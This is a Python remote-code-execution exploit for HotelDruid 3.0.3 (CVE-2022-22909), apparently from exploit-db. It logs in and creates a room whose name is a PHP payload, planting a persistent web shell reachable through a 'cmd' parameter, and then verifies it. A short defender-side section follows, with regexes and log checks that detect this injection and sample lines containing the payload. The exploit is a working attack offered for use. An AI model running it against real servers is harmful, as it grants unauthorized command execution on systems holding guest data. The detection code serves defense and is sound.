#!/usr/bin/python3
# Exploit Title: Hotel Druid 3.0.3 - Remote Code Execution (RCE)
# Date: 05/01/2022
# Exploit Author: 0z09e (https://twitter.com/0z09e)
# Vendor Homepage: https://www.hoteldruid.com/
# Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz
# Version: 3.0.3
# CVE : CVE-2022-22909

import argparse
import sys

import requests


def login(target, username="", password="", noauth=False):
    """Log in (or just load the dashboard when no authentication is required) and
    return the session token and the hidden 'anno' (year) field used by later requests."""
    login_data = {
        "vers_hinc": "1",
        "nome_utente_phpr": username,
        "password_phpr": password,
    }
    if not noauth:
        login_req = requests.post(f"{target}/inizio.php", data=login_data, verify=False)
        nav_marker = '<a class="nav" id="nb_men" href="https://www.exploit-db.com/exploits/50754/inizio.php?id_sessione='
        if nav_marker in login_req.text:
            token = login_req.text.split(nav_marker)[1].split('"> <b>')[0]
            anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0]
            return {"token": token, "anno": anno}
        return False
    login_req = requests.get(f"{target}/inizio.php", verify=False)
    try:
        anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0]
        return {"token": "", "anno": anno}
    except IndexError:
        return False


def check_privilege(target, anno, token=""):
    """The room table only shows a 'Modify' control to users allowed to add rooms."""
    priv_req = requests.get(
        f"{target}/visualizza_tabelle.php?id_sessione={token}&tipo_tabella=appartamenti",
        verify=False,
    )
    return "Modify" in priv_req.text


def add_room(target, anno, token=""):
    """Create a room whose name is a PHP expression; the name is written unescaped
    into dati/selectappartamenti.php, where it is evaluated."""
    add_room_data = {
        "anno": anno,
        "id_sessione": token,
        "n_app": "{${system($_REQUEST['cmd'])}}",
        "crea_app": "SI",
        "crea_letti": "",
        "n_letti": "",
        "tipo_tabella": "appartamenti",
    }
    add_req = requests.post(f"{target}/visualizza_tabelle.php", data=add_room_data, verify=False)
    return "has been added" in add_req.text


def test_code_execution(target):
    """Request the generated file with cmd=id and return the first output line on success."""
    code_execution_req = requests.get(f"{target}/dati/selectappartamenti.php?cmd=id")
    if "uid=" in code_execution_req.text:
        return code_execution_req.text.split("\n")[0]
    return False


def main():
    banner = (
        "\nHotel Druid 3.0.3 - Remote Code Execution (CVE-2022-22909)\n\n"
        "Exploit By - 0z09e (https://twitter.com/0z09e)\n\n"
    )
    parser = argparse.ArgumentParser()
    req_args = parser.add_argument_group('required arguments')
    req_args.add_argument("-t", "--target", help="Target URL. Example : http://10.20.30.40/path/to/hoteldruid", required=True)
    req_args.add_argument("-u", "--username", help="Username", required=False)
    req_args.add_argument("-p", "--password", help="password", required=False)
    req_args.add_argument("--noauth", action="store_true", default=False,
                          help="If no authentication is required to access the dashboard", required=False)
    args = parser.parse_args()

    target = args.target.rstrip("/")
    noauth = args.noauth
    username = args.username
    password = args.password

    if not noauth and (username is None or password is None):
        print('[-] Please provide the authentication method.')
        sys.exit(1)

    print(banner)
    if not noauth:
        print(f"[*] Logging in with the credential {username}:{password}")
        login_result = login(username=username, password=password, target=target)
        if login_result:
            token = login_result.get('token')
            anno = login_result.get('anno')
        else:
            print("[-] Login failed, check your credential or check if login is required or not.")
            sys.exit(1)
    else:
        print('[*] Trying to access the Dashboard.')
        login_result = login(username=username, password=password, target=target, noauth=True)
        if login_result:
            token = login_result.get('token')
            anno = login_result.get('anno')
        else:
            print('[-] Unable to access the dashboard, maybe the dashboard is protected with credential.')
            sys.exit(1)

    print("[*] Checking the privilege of the user.")
    if check_privilege(target=target, token=token, anno=anno):
        print("[+] User has the privilege to add room.")
    else:
        print("[-] User doesn't have the privilege to add room.")
        sys.exit(1)

    print("[*] Adding a new room.")
    if add_room(target=target, anno=anno, token=token):
        print('[+] Room has been added successfully.')
    else:
        print('[-] Unknown error occurred, unable to add room. Maybe the room has already been added.')
        sys.exit(1)

    print('[*] Testing code execution')
    output = test_code_execution(target=target)
    if output:
        print(f"[+] Code executed successfully, go to {target}/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.")
        print(f'[+] Example : {target}/dati/selectappartamenti.php?cmd=id')
        print(f"[+] Example Output : {output}")
    else:
        print(f"[-] Code execution failed. If the target is Windows, check {target}/dati/selectappartamenti.php "
              f"and try to execute the code with the parameter 'cmd'. Example : {target}/dati/selectappartamenti.php?cmd=hostname")
        sys.exit(1)


if __name__ == "__main__":
    main()
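A defender-side check for the pattern this script relies on, added here as an example that is not part of the exploit-db entry or the HotelDruid project: it scans the generated dati/selectappartamenti.php for PHP constructs that never belong in a list of room-name literals, and flags access-log requests that fetch that file directly with a query string. The file layout and the log lines are constructed samples, and it is an assumption that the file is normally only included server-side rather than requested with parameters.

```python
"""Defender-side checks for the CVE-2022-22909 pattern, where a room name
submitted as n_app is written unescaped into dati/selectappartamenti.php and
evaluated as PHP on the next request to that file."""
import re
from urllib.parse import parse_qs, urlsplit

# PHP constructs that never belong in a generated list of room-name literals.
SUSPICIOUS_PHP = re.compile(
    r"\$\{|\$_(?:REQUEST|GET|POST|COOKIE)\b|"
    r"\b(?:system|exec|shell_exec|passthru|eval)\s*\(|`"
)


def scan_generated_file(text):
    """Return (line_no, line) pairs from the generated PHP file that look injected."""
    return [(n, line.strip()) for n, line in enumerate(text.splitlines(), 1)
            if SUSPICIOUS_PHP.search(line)]


# Combined-format access log: client IP, then "METHOD path" inside the request quotes.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)')


def scan_access_log(lines):
    """Flag direct requests to the generated include file that carry a query string.
    Assumption: in normal use the file is only included server-side, so any such
    request (for example a ?cmd= parameter) is worth an alert."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("path"))
        if url.path.endswith("/dati/selectappartamenti.php") and url.query:
            hits.append((m.group("ip"), parse_qs(url.query)))
    return hits


# Constructed samples (not real HotelDruid output): a generated file with one
# injected room name, and two access-log lines.
SAMPLE_FILE = "\n".join([
    "<?php",
    '$nomi_app = array("101", "102");',
    '$nomi_app[] = "{${system($_REQUEST[\'cmd\'])}}";',
    "?>",
])
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Jan/2022:10:00:00 +0000] "GET /hoteldruid/dati/selectappartamenti.php?cmd=id HTTP/1.1" 200 120',
    '10.0.0.6 - - [05/Jan/2022:10:00:01 +0000] "GET /hoteldruid/inizio.php HTTP/1.1" 200 5120',
]
```

Run on a live install, point scan_generated_file at the real dati/selectappartamenti.php contents and scan_access_log at the web server's access log; the file check is the more reliable of the two because the injected name persists on disk even after the attacker's requests have rotated out of the logs.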